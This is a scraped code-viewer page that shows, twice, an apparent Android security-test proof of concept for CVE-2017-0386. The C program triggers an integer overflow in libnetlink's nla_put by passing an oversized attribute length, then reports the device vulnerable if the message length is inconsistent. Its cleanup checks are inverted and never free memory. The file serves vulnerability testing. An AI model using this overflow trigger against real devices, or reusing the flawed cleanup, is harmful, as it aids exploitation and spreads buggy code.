poc.c - Android社区 - https://www.androidos.net.cn/

/**
 * Copyright (C) 2019 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
#define _GNU_SOURCE

#define LOG_TAG "CVE-2017-0386"

#include <sys/wait.h>
#include <sys/types.h>
#include <stdio.h>
#include <log/log.h>
#include <netlink/msg.h>
#include <netlink/netlink.h>
#include <netlink-private/object-api.h>
#include <netlink-private/types.h>
#include <netlink/object.h>
#include <netlink/attr.h>

#include "../includes/common.h"

int main(void) {
  struct nl_msg *message = NULL;
  struct nlmsghdr *hdr;
  char *data = NULL;
  uint32_t result = 0;
  int ret = EXIT_SUCCESS;
  int pagesize = getpagesize();
  size_t payloadlength = pagesize + 12 - 0x30;
  size_t payload2length = pagesize;

message = nlmsg_alloc();
  if (message == NULL) {
    ALOGE("Alloc message memory failed");
    return EXIT_FAILURE;
  }

ALOGI("nl_msg.nm_size : %zx\n", message->nm_size);
  hdr = message->nm_nlh;

//allocate memory for data with payloadlength
  data = malloc(payloadlength);
  if (data == NULL) {
    ALOGE("Alloc data memory failed");
    nlmsg_free(message);
    return EXIT_FAILURE;
  }

memset(data, 0x41, payloadlength);
  nla_put(message, 0x4444, payloadlength, data);
  result = hdr->nlmsg_len;
  ALOGI("message address [%p, %p]", hdr, nlmsg_tail(hdr));
  ALOGI("message len = 0x%x", result);

free(data);
  data = NULL;

//allocate memory for data with payload2length
  data = malloc(payload2length);
  if (data == NULL) {
    ALOGE("Alloc data2 memory failed");
    nlmsg_free(message);
    return EXIT_FAILURE;
  }
  memset(data, 0x33, payload2length);
  ALOGI("\n\n\nPutting down overflow.......\n\n\n");
  nla_put(message, 0x8888, 0xFFFFF000, data);

ALOGI("message address [%p, %p]", hdr, nlmsg_tail(hdr));
  ALOGI("message len = 0x%x", hdr->nlmsg_len);

/*
   * return 113 error code if length is mismatch
   */
  if(result != hdr->nlmsg_len) {
    ret = EXIT_VULNERABLE;
  }

if(!data) {
    free(data);
    data = NULL;
  }

if(!message) {
    nlmsg_free(message);
    message = NULL;
  }
  return ret;
}

C++程序 | 101行 | 2.52 KB

/**
 * Copyright (C) 2019 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
#define _GNU_SOURCE

#define LOG_TAG "CVE-2017-0386"

#include <sys/wait.h>
#include <sys/types.h>
#include <stdio.h>
#include <log/log.h>
#include <netlink/msg.h>
#include <netlink/netlink.h>
#include <netlink-private/object-api.h>
#include <netlink-private/types.h>
#include <netlink/object.h>
#include <netlink/attr.h>

#include "../includes/common.h"

int main(void) {
  struct nl_msg *message = NULL;
  struct nlmsghdr *hdr;
  char *data = NULL;
  uint32_t result = 0;
  int ret = EXIT_SUCCESS;
  int pagesize = getpagesize();
  size_t payloadlength = pagesize + 12 - 0x30;
  size_t payload2length = pagesize;

  message = nlmsg_alloc();
  if (message == NULL) {
    ALOGE("Alloc message memory failed");
    return EXIT_FAILURE;
  }

  ALOGI("nl_msg.nm_size : %zx\n", message->nm_size);
  hdr = message->nm_nlh;

  //allocate memory for data with payloadlength
  data = malloc(payloadlength);
  if (data == NULL) {
    ALOGE("Alloc data memory failed");
    nlmsg_free(message);
    return EXIT_FAILURE;
  }

  memset(data, 0x41, payloadlength);
  nla_put(message, 0x4444, payloadlength, data);
  result = hdr->nlmsg_len;
  ALOGI("message address [%p, %p]", hdr, nlmsg_tail(hdr));
  ALOGI("message len = 0x%x", result);

  free(data);
  data = NULL;

  //allocate memory for data with payload2length
  data = malloc(payload2length);
  if (data == NULL) {
    ALOGE("Alloc data2 memory failed");
    nlmsg_free(message);
    return EXIT_FAILURE;
  }
  memset(data, 0x33, payload2length);
  ALOGI("\n\n\nPutting down overflow.......\n\n\n");
  nla_put(message, 0x8888, 0xFFFFF000, data);

  ALOGI("message address [%p, %p]", hdr, nlmsg_tail(hdr));
  ALOGI("message len = 0x%x", hdr->nlmsg_len);

  /*
   * return 113 error code if length is mismatch
   */
  if(result != hdr->nlmsg_len) {
    ret = EXIT_VULNERABLE;
  }

  if(!data) {
    free(data);
    data = NULL;
  }

  if(!message) {
    nlmsg_free(message);
    message = NULL;
  }
  return ret;
}

登录后可以享受更多权益